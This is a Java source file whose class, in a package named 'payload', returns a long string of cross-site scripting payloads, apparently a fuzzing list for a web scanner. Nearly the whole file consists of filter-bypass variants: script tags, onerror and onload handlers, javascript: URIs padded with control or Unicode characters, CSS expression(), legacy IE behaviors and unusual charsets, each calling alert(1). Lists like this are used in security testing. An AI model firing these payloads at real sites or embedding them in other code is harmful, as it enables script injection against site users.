/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package payload;

import java.util.ArrayList;

/**
 *
 * @author Shaco JX
 */
public class A3p_6 {

    public ArrayList<String> XSS() {
        ArrayList<String> list = new ArrayList<>();
        String payload = "<script>javascript:alert(1)</script\\x0B\n"
                + "<script charset=\"\\x22>javascript:alert(1)</script>\n"
                + "<!--\\x3E<img src=xxx:x onerror=javascript:alert(1)> -->\n"
                + "--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->\n"
                + "--><!-- --\\x00> <img src=xxx:x onerror=javascript:alert(1)> -->\n"
                + "--><!-- --\\x21> <img src=xxx:x onerror=javascript:alert(1)> -->\n"
                + "--><!-- --\\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->\n"
                + "`\"'><img src='#\\x27 onerror=javascript:alert(1)>\n"
                + "<a href=\"javascript\\x3Ajavascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "\"'`><p><svg><script>a='hello\\x27;javascript:alert(1)//';</script></p>\n"
                + "<a href=\"javas\\x00cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x07cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x0Dcript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x0Acript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x08cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x02cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x03cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x04cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x01cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x05cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x0Bcript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x09cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x06cript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javas\\x0Ccript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<script>/* *\\x2A/javascript:alert(1)// */</script>\n"
                + "<script>/* *\\x00/javascript:alert(1)// */</script>\n"
                + "<style></style\\x3E<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n"
                + "<style></style\\x0D<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n"
                + "<style></style\\x09<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n"
                + "<style></style\\x20<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n"
                + "<style></style\\x0A<img src=\"about:blank\" onerror=javascript:alert(1)//></style>\n"
                + "\"'`>ABC<div style=\"font-family:'foo'\\x7Dx:expression(javascript:alert(1);/*';\">DEF \n"
                + "\"'`>ABC<div style=\"font-family:'foo'\\x3Bx:expression(javascript:alert(1);/*';\">DEF \n"
                + "<script>if(\"x\\\\xE1\\x96\\x89\".length==2) { javascript:alert(1);}</script>\n"
                + "<script>if(\"x\\\\xE0\\xB9\\x92\".length==2) { javascript:alert(1);}</script>\n"
                + "<script>if(\"x\\\\xEE\\xA9\\x93\".length==2) { javascript:alert(1);}</script>\n"
                + "'`\"><\\x3Cscript>javascript:alert(1)</script>\n"
                + "'`\"><\\x00script>javascript:alert(1)</script>\n"
                + "\"'`><\\x3Cimg src=xxx:x onerror=javascript:alert(1)>\n"
                + "\"'`><\\x00img src=xxx:x onerror=javascript:alert(1)>\n"
                + "<script src=\"data:text/plain\\x2Cjavascript:alert(1)\"></script>\n"
                + "<script src=\"data:\\xD4\\x8F,javascript:alert(1)\"></script>\n"
                + "<script src=\"data:\\xE0\\xA4\\x98,javascript:alert(1)\"></script>\n"
                + "<script src=\"data:\\xCB\\x8F,javascript:alert(1)\"></script>\n"
                + "<script\\x20type=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x09type=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>\n"
                + "ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF\n"
                + "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF\n"
                + "<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n"
                + "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>\n"
                + "\"`'><script>\\x3Bjavascript:alert(1)</script>\n"
                + "\"`'><script>\\x0Djavascript:alert(1)</script>\n"
                + "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>\n"
                + "\"`'><script>\\x09javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>\n"
                + "\"`'><script>\\x00javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>\n"
                + "\"`'><script>\\x0Cjavascript:alert(1)</script>\n"
                + "\"`'><script>\\x2Bjavascript:alert(1)</script>\n"
                + "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>\n"
                + "\"`'><script>-javascript:alert(1)</script>\n"
                + "\"`'><script>\\x0Ajavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>\n"
                + "\"`'><script>\\x7Ejavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>\n"
                + "\"`'><script>\\xC2\\x85javascript:alert(1)</script>\n"
                + "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>\n"
                + "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>\n"
                + "\"`'><script>\\x21javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>\n"
                + "\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>\n"
                + "\"`'><script>\\x0Bjavascript:alert(1)</script>\n"
                + "\"`'><script>\\x20javascript:alert(1)</script>\n"
                + "\"`'><script>\\xC2\\xA0javascript:alert(1)</script>\n"
                + "\"/><img/onerror=\\x0Bjavascript:alert(1)\\x0Bsrc=xxx:x />\n"
                + "\"/><img/onerror=\\x22javascript:alert(1)\\x22src=xxx:x />\n"
                + "\"/><img/onerror=\\x09javascript:alert(1)\\x09src=xxx:x />\n"
                + "\"/><img/onerror=\\x27javascript:alert(1)\\x27src=xxx:x />\n"
                + "\"/><img/onerror=\\x0Ajavascript:alert(1)\\x0Asrc=xxx:x />\n"
                + "\"/><img/onerror=\\x0Cjavascript:alert(1)\\x0Csrc=xxx:x />\n"
                + "\"/><img/onerror=\\x0Djavascript:alert(1)\\x0Dsrc=xxx:x />\n"
                + "\"/><img/onerror=\\x60javascript:alert(1)\\x60src=xxx:x />\n"
                + "\"/><img/onerror=\\x20javascript:alert(1)\\x20src=xxx:x />\n"
                + "<script\\x2F>javascript:alert(1)</script>\n"
                + "<script\\x20>javascript:alert(1)</script>\n"
                + "<script\\x0D>javascript:alert(1)</script>\n"
                + "<script\\x0A>javascript:alert(1)</script>\n"
                + "<script\\x0C>javascript:alert(1)</script>\n"
                + "<script\\x00>javascript:alert(1)</script>\n"
                + "<script\\x09>javascript:alert(1)</script>\n"
                + "\"><img src=x onerror=javascript:alert(1)>\n"
                + "\"><img src=x onerror=javascript:alert('1')>\n"
                + "\"><img src=x onerror=javascript:alert(\"1\")>\n"
                + "\"><img src=x onerror=javascript:alert(`1`)>\n"
                + "\"><img src=x onerror=javascript:alert(('1'))>\n"
                + "\"><img src=x onerror=javascript:alert((\"1\"))>\n"
                + "\"><img src=x onerror=javascript:alert((`1`))>\n"
                + "\"><img src=x onerror=javascript:alert(A)>\n"
                + "\"><img src=x onerror=javascript:alert((A))>\n"
                + "\"><img src=x onerror=javascript:alert(('A'))>\n"
                + "\"><img src=x onerror=javascript:alert('A')>\n"
                + "\"><img src=x onerror=javascript:alert((\"A\"))>\n"
                + "\"><img src=x onerror=javascript:alert(\"A\")>\n"
                + "\"><img src=x onerror=javascript:alert((`A`))>\n"
                + "\"><img src=x onerror=javascript:alert(`A`)>\n"
                + "`\"'><img src=xxx:x onerror\\x0B=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x onerror\\x00=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x onerror\\x0C=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x onerror\\x0D=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x onerror\\x20=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x onerror\\x0A=javascript:alert(1)>\n"
                + "`\"'><img src=xxx:x onerror\\x09=javascript:alert(1)>\n"
                + "<script>javascript:alert(1)<\\x00/script>\n"
                + "<img src=# onerror\\x3D\"javascript:alert(1)\" >\n"
                + "<input onfocus=javascript:alert(1) autofocus>\n"
                + "<input onblur=javascript:alert(1) autofocus><input autofocus>\n"
                + "<video poster=javascript:javascript:alert(1)//\n"
                + "<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>\n"
                + "<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X\n"
                + "<video><source onerror=\"javascript:javascript:alert(1)\">\n"
                + "<video onerror=\"javascript:javascript:alert(1)\"><source>\n"
                + "<form><button formaction=\"javascript:javascript:alert(1)\">X\n"
                + "<body oninput=javascript:alert(1)><input autofocus>\n"
                + "<math href=\"javascript:javascript:alert(1)\">CLICKME</math>  <math> <maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:javascript:alert(1)\">CLICKME</maction> </math>\n"
                + "<frameset onload=javascript:alert(1)>\n"
                + "<table background=\"javascript:javascript:alert(1)\">\n"
                + "<!--<img src=\"--><img src=x onerror=javascript:alert(1)//\">\n"
                + "<comment><img src=\"</comment><img src=x onerror=javascript:alert(1))//\">\n"
                + "<![><img src=\"]><img src=x onerror=javascript:alert(1)//\">\n"
                + "<style><img src=\"</style><img src=x onerror=javascript:alert(1)//\">\n"
                + "<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>\n"
                + "<head><base href=\"javascript://\"></head><body><a href=\"/. /,javascript:alert(1)//#\">XXX</a></body>\n"
                + "<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>\n"
                + "<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>\n"
                + "<object data=\"data:text/html;base64,%(base64)s\">\n"
                + "<embed src=\"data:text/html;base64,%(base64)s\">\n"
                + "<b <script>alert(1)</script>0\n"
                + "<div id=\"div1\"><input value=\"``onmouseover=javascript:alert(1)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>\n"
                + "<x '=\"foo\"><x foo='><img src=x onerror=javascript:alert(1)//'>\n"
                + "<embed src=\"javascript:alert(1)\">\n"
                + "<img src=\"javascript:alert(1)\">\n"
                + "<image src=\"javascript:alert(1)\">\n"
                + "<script src=\"javascript:alert(1)\">\n"
                + "<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x\n"
                + "<? foo=\"><script>javascript:alert(1)</script>\">\n"
                + "<! foo=\"><script>javascript:alert(1)</script>\">\n"
                + "</ foo=\"><script>javascript:alert(1)</script>\">\n"
                + "<? foo=\"><x foo='?><script>javascript:alert(1)</script>'>\">\n"
                + "<! foo=\"[[[Inception]]\"><x foo=\"]foo><script>javascript:alert(1)</script>\">\n"
                + "<% foo><x foo=\"%><script>javascript:alert(1)</script>\">\n"
                + "<div id=d><x xmlns=\"><iframe onload=javascript:alert(1)\"></div> <script>d.innerHTML=d.innerHTML</script>\n"
                + "<img \\x00src=x onerror=\"alert(1)\">\n"
                + "<img \\x47src=x onerror=\"javascript:alert(1)\">\n"
                + "<img \\x11src=x onerror=\"javascript:alert(1)\">\n"
                + "<img \\x12src=x onerror=\"javascript:alert(1)\">\n"
                + "<img\\x47src=x onerror=\"javascript:alert(1)\">\n"
                + "<img\\x10src=x onerror=\"javascript:alert(1)\">\n"
                + "<img\\x13src=x onerror=\"javascript:alert(1)\">\n"
                + "<img\\x32src=x onerror=\"javascript:alert(1)\">\n"
                + "<img\\x47src=x onerror=\"javascript:alert(1)\">\n"
                + "<img\\x11src=x onerror=\"javascript:alert(1)\">\n"
                + "<img \\x47src=x onerror=\"javascript:alert(1)\">\n"
                + "<img \\x34src=x onerror=\"javascript:alert(1)\">\n"
                + "<img \\x39src=x onerror=\"javascript:alert(1)\">\n"
                + "<img \\x00src=x onerror=\"javascript:alert(1)\">\n"
                + "<img src\\x09=x onerror=\"javascript:alert(1)\">\n"
                + "<img src\\x10=x onerror=\"javascript:alert(1)\">\n"
                + "<img src\\x13=x onerror=\"javascript:alert(1)\">\n"
                + "<img src\\x32=x onerror=\"javascript:alert(1)\">\n"
                + "<img src\\x12=x onerror=\"javascript:alert(1)\">\n"
                + "<img src\\x11=x onerror=\"javascript:alert(1)\">\n"
                + "<img src\\x00=x onerror=\"javascript:alert(1)\">\n"
                + "<img src\\x47=x onerror=\"javascript:alert(1)\">\n"
                + "<img src=x\\x09onerror=\"javascript:alert(1)\">\n"
                + "<img src=x\\x10onerror=\"javascript:alert(1)\">\n"
                + "<img src=x\\x11onerror=\"javascript:alert(1)\">\n"
                + "<img src=x\\x12onerror=\"javascript:alert(1)\">\n"
                + "<img src=x\\x13onerror=\"javascript:alert(1)\">\n"
                + "<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">\n"
                + "<img src=x onerror=\\x09\"javascript:alert(1)\">\n"
                + "<img src=x onerror=\\x10\"javascript:alert(1)\">\n"
                + "<img src=x onerror=\\x11\"javascript:alert(1)\">\n"
                + "<img src=x onerror=\\x12\"javascript:alert(1)\">\n"
                + "<img src=x onerror=\\x32\"javascript:alert(1)\">\n"
                + "<img src=x onerror=\\x00\"javascript:alert(1)\">\n"
                + "<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>\n"
                + "<img src=\"x` `<script>javascript:alert(1)</script>\"` `>\n"
                + "<img src onerror /\" '\"= alt=javascript:alert(1)//\">\n"
                + "<title onpropertychange=javascript:alert(1)></title><title title=>\n"
                + "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">\n"
                + "<!--[if]><script>javascript:alert(1)</script -->\n"
                + "<!--[if<img src=x onerror=javascript:alert(1)//]> -->\n"
                + "<script src=\"/\\%(jscript)s\"></script>\n"
                + "<script src=\"\\\\%(jscript)s\"></script>\n"
                + "<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object> <object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"javascript:alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>\n"
                + "<a style=\"-o-link:'javascript:javascript:alert(1)';-o-link-source:current\">X\n"
                + "<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>\n"
                + "<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d\n"
                + "<style>@import \"data:,*%7bx:expression(javascript:alert(1))%7D\";</style>\n"
                + "<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"javascript:alert(1);\">XXX</a></a><a href=\"javascript:javascript:alert(1)\">XXX</a>\n"
                + "<style>*[{}@import'%(css)s?]</style>X\n"
                + "<div style=\"font-family:'foo&#10;;color:red;';\">XXX\n"
                + "<div style=\"font-family:foo}color=red;\">XXX\n"
                + "<// style=x:expression\\28javascript:alert(1)\\29>\n"
                + "<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}</style>\n"
                + "<div style=content:url(%(svg)s)></div>\n"
                + "<div style=\"list-style:url(http://foo.f)\\20url(javascript:javascript:alert(1));\">X\n"
                + "<div id=d><div style=\"font-family:'sans\\27\\3B color\\3Ared\\3B'\">X</div></div> <script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>\n"
                + "<div style=\"background:url(/f#&#127;oo/;color:red/*/foo.jpg);\">X\n"
                + "<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X\n"
                + "<div id=\"x\">XXX</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style>\n"
                + "<x style=\"background:url('x&#1;;color:red;/*')\">XXX</x>\n"
                + "<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>\n"
                + "<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>\n"
                + "<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>\n"
                + "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>\n"
                + "<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi\n"
                + "<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>\n"
                + "<meta charset=\"mac-farsi\">¼script¾javascript:alert(1)¼/script¾\n"
                + "X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >\n"
                + "1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>\n"
                + "1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>\n"
                + "<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>\n"
                + "1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>\n"
                + "<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:javascript:alert(1)\">XXX</a>\n"
                + "<x style=\"behavior:url(%(sct)s)\">\n"
                + "<xml id=\"xss\" src=\"%(htc)s\"></xml> <label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>\n"
                + "<event-source src=\"%(event)s\" onload=\"javascript:alert(1)\">\n"
                + "<a href=\"javascript:javascript:alert(1)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\">\n"
